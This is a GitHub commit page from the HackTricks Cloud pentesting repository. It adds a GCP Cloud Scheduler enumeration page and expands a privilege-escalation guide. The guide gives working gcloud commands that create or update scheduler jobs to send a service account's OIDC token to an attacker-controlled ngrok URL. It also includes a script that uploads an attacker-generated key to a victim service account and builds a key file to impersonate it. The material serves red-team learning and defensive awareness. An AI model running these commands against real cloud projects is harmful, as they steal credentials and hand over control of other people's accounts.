Skip to content

Commit

Permalink
GITBOOK-652: No subject
Browse files Browse the repository at this point in the history
  • Loading branch information
@carlospolop @gitbook-bot
carlospolop authored and gitbook-bot committed Aug 6, 2024
1 parent 40c56f5 commit 344b9a6
Show file tree
Hide file tree
Showing 4 changed files with 167 additions and 9 deletions.
Binary file added .gitbook/assets/image (347).png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
3 changes: 2 additions & 1 deletion SUMMARY.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -100,7 +100,7 @@
* [GCP - Cloudbuild Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md)
* [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md)
* [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md)
* [GCP - Cloudscheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md)
* [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md)
* [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md)
* [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md)
* [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md)
Expand Down Expand Up @@ -149,6 +149,7 @@
* [GCP - Cloud Run Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md)
* [GCP - Cloud Shell Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md)
* [GCP - Cloud SQL Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md)
* [GCP - Cloud Scheduler Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md)
* [GCP - Compute Enum](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md)
* [GCP - Compute Instances](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md)
* [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md)
Expand Down
100 changes: 92 additions & 8 deletions ...sting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md
View file
Original file line number Diff line number Diff line change
@@ -1,8 +1,8 @@
# GCP - Cloudscheduler Privesc
# GCP - Cloud Scheduler Privesc

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/image.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

Expand All @@ -15,29 +15,113 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/image (2).png" alt="" d
</details>
{% endhint %}

## cloudscheduler
## Cloud Scheduler

More information in:

{% content-ref url="../gcp-services/gcp-cloud-scheduler-enum.md" %}
[gcp-cloud-scheduler-enum.md](../gcp-services/gcp-cloud-scheduler-enum.md)
{% endcontent-ref %}

### `cloudscheduler.jobs.create` , `iam.serviceAccounts.actAs`, (`cloudscheduler.locations.list`)

An attacker with these permissions could exploit **Cloud Scheduler** to **authenticate cron jobs as a specific Service Account**. By crafting an HTTP POST request, the attacker schedules actions, like creating a Storage bucket, to execute under the Service Account's identity. This method leverages the **Scheduler's ability to target `*.googleapis.com` endpoints and authenticate requests**, allowing the attacker to manipulate Google API endpoints directly using a simple `gcloud` command.

Example to create a new job that will use a specific Service Account to create a new Storage bucket on our behalf, we could run the following command:
* **Contact any google API via`googleapis.com` with OAuth token header**

Create a new Storage bucket:

{% code overflow="wrap" %}
```bash
gcloud scheduler jobs create http test schedule='* * * * *' uri='https://storage.googleapis.com/storage/v1/b?project=<PROJECT-ID>' --message-body "{'name':'new-bucket-name'}" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com headers Content-Type=application/json
gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://storage.googleapis.com/storage/v1/b?project=<PROJECT-ID>' --message-body "{'name':'new-bucket-name'}" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com --headers "Content-Type=application/json" --location us-central1
```
{% endcode %}

To escalate privileges, an **attacker merely crafts an HTTP request targeting the desired API, impersonating the specified Service Account**

* **Exfiltrate OIDC service account token**

{% code overflow="wrap" %}
```bash
gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']

# Listen in the ngrok address to get the OIDC token in clear text.
```
{% endcode %}

### `cloudscheduler.jobs.update` , `iam.serviceAccounts.actAs`, (`cloudscheduler.locations.list`)

Like in the previous scenario it's possible to **update an already created scheduler** to steal the token or perform actions. For example:

{% code overflow="wrap" %}
```bash
gcloud scheduler jobs update http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']

# Listen in the ngrok address to get the OIDC token in clear text.
```
{% endcode %}

Another example to upload a private key to a SA and impersonate it:

{% code overflow="wrap" %}
```bash
# Generate local private key
openssl req -x509 -nodes -newkey rsa:2048 -days 365 \
-keyout /tmp/private_key.pem \
-out /tmp/public_key.pem \
-subj "/CN=unused"

# Remove last new line character of the public key
file_size=$(wc -c < /tmp/public_key.pem)
new_size=$((file_size - 1))
truncate -s $new_size /tmp/public_key.pem

# Update scheduler to upload the key to a SA
gcloud scheduler jobs update http scheduler_lab_1 \
--schedule='* * * * *' \
--uri="https://iam.googleapis.com/v1/projects/$PROJECT_ID/serviceAccounts/victim@$PROJECT_ID.iam.gserviceaccount.com/keys:upload?alt=json" \
--message-body="{\"publicKeyData\": \"$(cat /tmp/public_key.pem | base64)\"}" \
--update-headers "Content-Type=application/json" \
--location us-central1 \
--oauth-service-account-email privileged@$PROJECT_ID.iam.gserviceaccount.com

# Check the logs to check it worked

# Build the json to contact the SA
## Get privatekey in json format
file_content=$(<"/tmp/private_key.pem")
private_key_json=$(jq -Rn --arg str "$file_content" '$str')

## Get ID of the generated key
gcloud iam service-accounts keys list --iam-account=victim@$PROJECT_ID.iam.gserviceaccount.com

# Create the json in a file
{
"type": "service_account",
"project_id": "$PROJECT_ID",
"private_key_id": "<key id from key list>",
"private_key": "$private_key_json",
"client_email": "victim@$PROJECT_ID.iam.gserviceaccount.com",
"client_id": "$(gcloud iam service-accounts describe victim@$PROJECT_ID.iam.gserviceaccount.com | grep oauth2ClientId | cut -d "'" -f 2)",
"auth_uri": "https://accounts.google.com/o/oauth2/auth",
"token_uri": "https://oauth2.googleapis.com/token",
"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/victim%40$PROJECT_ID.iam.gserviceaccount.com",
"universe_domain": "googleapis.com"
}

# Activate the generated key
gcloud auth activate-service-account --key-file=/tmp/fake_key.json
```
{% endcode %}

## References

* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/image.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

Expand Down
73 changes: 73 additions & 0 deletions pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,73 @@
# GCP - Cloud Scheduler Enum

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Basic Information

Google Cloud Scheduler is a fully managed **cron job service** that allows you to run arbitrary jobs—such as batch, big data jobs, cloud infrastructure operations—at fixed times, dates, or intervals. It is integrated with Google Cloud services, providing a way to **automate various tasks like updates or batch processing on a regular schedule**.

Although from an offensive point of view this sounds amazing, it actually isn't that interesting because the service just allow to schedule certain simple actions at a certain time and not to execute arbitrary code.

At the moment of this writing these are the actions this service allows to schedule:

<figure><img src="../../../.gitbook/assets/image (347).png" alt="" width="563"><figcaption></figcaption></figure>

* **HTTP**: Send an HTTP request defining the headers and body of the request.
* **Pub/Sub**: Send a message into an specific topic
* **App Engine HTTP**: Send an HTTP request to an app built in App Engine
* **Workflows**: Call a GCP Workflow.

## Service Accounts

A service account is not always required by each scheduler. The **Pub/Sub** and **App Engine HTTP** types don't require any service account. The **Workflow** does require a service account, but it'll just invoke the workflow.\
Finally, the regular HTTP type doesn't require a service account, but it's possible to indicate that some kind of auth is required by the workflow and add either an **OAuth token or an OIDC token to the sent** HTTP request.

{% hint style="danger" %}
Therefore, it's possible to steal the **OIDC** token and abuse the **OAuth** token from service accounts **abusing the HTTP type**. More on this in the privilege escalation page.
{% endhint %}

Note that it's possible to limit the scope of the OAuth token sent, however, by default, it'll be `cloud-platform`.

## Enumeration

```bash
# Get schedulers in a location
gcloud scheduler jobs list --location us-central1

# Get information of an specific scheduler
gcloud scheduler jobs describe --location us-central1 <scheduler-name>
```

## Privilege Escalation

{% content-ref url="../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md" %}
[gcp-cloudscheduler-privesc.md](../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md)
{% endcontent-ref %}

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

0 comments on commit 344b9a6

Please sign in to comment.